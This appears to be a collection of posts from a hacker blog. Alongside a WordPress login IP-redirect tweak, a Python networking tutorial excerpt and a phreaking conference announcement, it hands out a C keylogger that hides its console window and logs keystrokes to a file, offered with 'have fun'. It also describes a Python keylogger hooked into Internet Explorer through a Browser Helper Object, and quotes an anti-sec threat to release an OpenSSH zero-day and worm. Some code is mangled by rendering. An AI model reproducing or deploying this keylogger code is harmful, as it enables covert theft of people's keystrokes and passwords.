Well, everyone this is a big decision for me.  I have a lot of things going on, and well, I have no time for Flyninja anymore.  After a few years of being up, having the opportunity to meet a ton of new people, it is time for me to move forward to new horizons.

Flyninja will no longer be updated from this moment on.  Have a good one everyone, it was a nice run while it lasted.

May the force be with you all.

-Circuitbomb

So I was just casually sitting here minding my own business this evening, working on a top secret project when all of a sudden my email alarm went crazy.  Yes I have an alarm.  A lot of the time I pass most of these bells and whistles off as spam, and close my e-mail client.  However this time I decided to actually check, and lo and behold, a message from Flyninja.net.

Now this was no ordinary e-mail, such as for a new comment, or a new post from one of our contributing authors.  No.  This was to notify me that my password had been forgotten by someone else, and had been reset.  That is an annoyance.  Oh but what to do? What to do?

I decided I would add a few lines of my own code to the login page.  This code checks for a specified IP address, and if it is not the defined IP, redirects the person somewhere else.  All in a couple lines of code.

Before I divulge this little trinket, letme just clarify that it’s very generic, and simple.  If you are the only person who posts to your blog, this is great.  If you have more than one author, then it will need a bit more added to it.  If you don’t have a static IP, then this probably is not a good idea for you.

Open up wp-login.php in your favorite editor and find the line:

add_action(‘login_head’, ‘noindex’);

This is found within the Function ‘login_header’ and may be about line 49

Beneath this line add this code:

$data = ‘you.ip.add.ress’;

if ($_SERVER['REMOTE_ADDR'] != $data) {

header(‘Location: http://www.somewebsite.com/’);

}

$data should equal your IP address, and after Location: you should add a website which you would like the stupid fucks who attempt to login to be redirected to.

Network Programming in Python and Graphics

In this Tutorial I will try and explain simple Networking concepts in Python. Some things you will learn here are GUI programming, Networking, threading and hopefully enough understanding to be able to send binary data over the network.

from Tkinter import *
import socket
from threading import *
import cPickle


Our import statements you will notice we import our GUI modules, our socket modules, threading for keeping the GUI from freezing during connections. Finally cPickle his allows to send binary data over the network

CMD_MSG, CMD_LINE = range(2)


create some global variables

first we define our server function assign a port to listen to and bind it to our IP address


def server():
port = 9000
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind((socket.gethostbyname(socket.gethostname()), int(port))) # bind to ip


next we create our loop
Read the rest of this entry »

Yea this is gonna be cool.

ConfCon is the first ever telephone conference of it’s kind.  Coming straight at you on July 25th will be a series of great talks.

Here are some of the sites participating in ConfCon:

Telephreak

netxs

Go Null Yourself

TEXTFILES.COM

InformationLeak

Hacker’s Hideaway

Here is the schedule of talks!

PhreakerD7 – Intro

Jason Scott – Keynote

PhreakerD7/sToRm – 711 Numbers

Don Froula – ProjectMF

Royal – Dox-Dropping Numbers

BitRobber – UIFN

ThoughtPhreaker – Livengood 2.0

Beave/Jfalcon – DSP Wardialing, X.25

- Open discussion -

ThoughtPhreaker – Future of ConfCon

Cant wait for this

For more info check out www.confcon.org

Here is a simple example keylogger code written in C

it has the ability to hide the cmd window

have fun

#include
#include
#include
#define _WIN32_WINNT 0×0500
#include

using namespace std;

int main(int argc, char *argv[])
{
HWND win;
win = GetConsoleWindow();
ShowWindow(win, SW_HIDE);
ofstream myfile;
myfile.open(“C:\\keys.txt”);
while (1) {
int i;
short keyit;
for (i = 32; i <= 256; i++) {
keyit = GetAsyncKeyState(i);
if (keyit == -32767) {
int keyEnd;
keyEnd = 81;
myfile << char(i);
if (i == keyEnd) {
myfile.close();
}
}
}
}
return 0;
}

So on one of my many journey’s across the internet I decided I wanted to create a Keylogger and bind it to the IE 6 Browser using a BHO (Browser Helper Objects)

this involved some interesting feats I will share here what I came up with. I decided I wanted to use python for this task as it was and still is rather rare to accomplish this

First I came across this code amply named bho_skel.py


import sys
import _winreg

from ctypes import *
from ctypes.com import IUnknown, PIUnknown, REFIID, GUID, STDMETHOD, HRESULT, \
COMObject
from ctypes.com.automation import IDispatch, BSTR, VARIANT, \
dispinterface, DISPMETHOD
from ctypes.com.register import Registrar
from ctypes.com.connectionpoints import dispinterface_EventReceiver, \
GetConnectionPoint

import ie6 # module generated by ctypes/com/tools/readtlb.py

# _Logger is pinched from ctypes 0.6.2
# ——————————————————————–
from ctypes import windll
kernel32 = windll.kernel32

Read the rest of this entry »

Here you go kiddies, enjoy this succulent fruit.

http://www.nopaste.com/p/aDTdT5s1C

oh btw, use it at your own risk.

It would seem that the anti-sec movement may make a move which is arguably against their supposed ethics contained in their movement manifesto. It was initially thought that being apart of this Anti-Security Movement was not disclosing vulnerabilities into the public. Well, please read on.

Posted to the full-disclosure mailing list Anti-Sec unveiled their intentions to publicly release working 0day exploit code for OpenSSH <= 5.2. As stated on Mon, 20 Jul 2009 16:32:18:

Dear Reader,
In 48 hours, the anti-sec movement will publicly unveil working exploit code
and full details for the zero-day OpenSSH vulnerability we discovered. It
will be posted to the Full-Disclosure security list.

Soon, the very foundations of Information Technology and Information
Security will be unearthed as millions upon million of systems running ANY
version of OpenSSH are compromised by wave after wave of script-kiddie and
malicious hacker.

Within 10 hours of the initial release of the OpenSSH 0-day exploit code,
anti-sec will be unleashing powerful computer worm source code with the
ability to auotmatically find and compromise systems running any and all
versions of OpenSSH.

This is an attack against all White Hat Hackers who think that running a
Penetration Test simply searching for known vulnerabilities is all they have
to do in order to receive their payment. Anti-sec will savor the moment when
White Hat Hackers are made to look like fools in the eyes of their clients.

Sincerely,

-anti-sec

Opinion:

Are you fucking serious? All this talk on how publicly released exploits are bad, and that security through obscurity is an objective your going to release an exploit. How does this justify anti-sec’s cause? If you ask me this goes against everything their movement is for. An OpenSSH 0day vulnerability must be to much to handle.